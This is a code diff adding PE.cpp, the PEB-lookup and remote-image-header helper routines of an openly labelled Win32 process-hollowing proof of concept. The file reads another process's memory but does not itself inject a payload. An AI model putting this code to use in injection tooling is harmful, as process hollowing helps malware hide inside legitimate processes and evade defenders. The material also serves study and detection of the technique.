updates and moves

n/a

Win32/Proof of Concepts/Process-Hollowing/sourcecode/ProcessHollowing/PE.cpp

@@ -0,0 +1,95 @@
+#include "stdafx.h"
+#include "windows.h"
+#include "internals.h"
+#include "pe.h"
+
+DWORD FindRemotePEB(HANDLE hProcess)
+{
+    HMODULE hNTDLL = LoadLibraryA("ntdll");
+
+    if (!hNTDLL)
+        return 0;
+
+    FARPROC fpNtQueryInformationProcess = GetProcAddress
+        (
+        hNTDLL,
+        "NtQueryInformationProcess"
+        );
+
+    if (!fpNtQueryInformationProcess)
+        return 0;
+
+    _NtQueryInformationProcess ntQueryInformationProcess = 
+        (_NtQueryInformationProcess)fpNtQueryInformationProcess;
+
+    PROCESS_BASIC_INFORMATION* pBasicInfo = 
+        new PROCESS_BASIC_INFORMATION();
+
+    DWORD dwReturnLength = 0;
+
+    ntQueryInformationProcess
+        (
+        hProcess, 
+        0, 
+        pBasicInfo, 
+        sizeof(PROCESS_BASIC_INFORMATION), 
+        &dwReturnLength
+        );
+
+    return pBasicInfo->PebBaseAddress;
+}
+
+PEB* ReadRemotePEB(HANDLE hProcess)
+{
+    DWORD dwPEBAddress = FindRemotePEB(hProcess);
+
+    PEB* pPEB = new PEB();
+
+    BOOL bSuccess = ReadProcessMemory
+        (
+        hProcess,
+        (LPCVOID)dwPEBAddress,
+        pPEB,
+        sizeof(PEB),
+        0
+        );
+
+    if (!bSuccess)
+        return 0;
+
+    return pPEB;
+}
+
+PLOADED_IMAGE ReadRemoteImage(HANDLE hProcess, LPCVOID lpImageBaseAddress)
+{
+    BYTE* lpBuffer = new BYTE[BUFFER_SIZE];
+
+    BOOL bSuccess = ReadProcessMemory
+        (
+        hProcess,
+        lpImageBaseAddress,
+        lpBuffer,
+        BUFFER_SIZE,
+        0
+        );
+
+    if (!bSuccess)
+        return 0;    
+
+    PIMAGE_DOS_HEADER pDOSHeader = (PIMAGE_DOS_HEADER)lpBuffer;
+
+    PLOADED_IMAGE pImage = new LOADED_IMAGE();
+
+    pImage->FileHeader = 
+        (PIMAGE_NT_HEADERS32)(lpBuffer + pDOSHeader->e_lfanew);
+
+    pImage->NumberOfSections = 
+        pImage->FileHeader->FileHeader.NumberOfSections;
+
+    pImage->Sections = 
+        (PIMAGE_SECTION_HEADER)(lpBuffer + pDOSHeader->e_lfanew + 
+        sizeof(IMAGE_NT_HEADERS32));
+
+    return pImage;
+}
+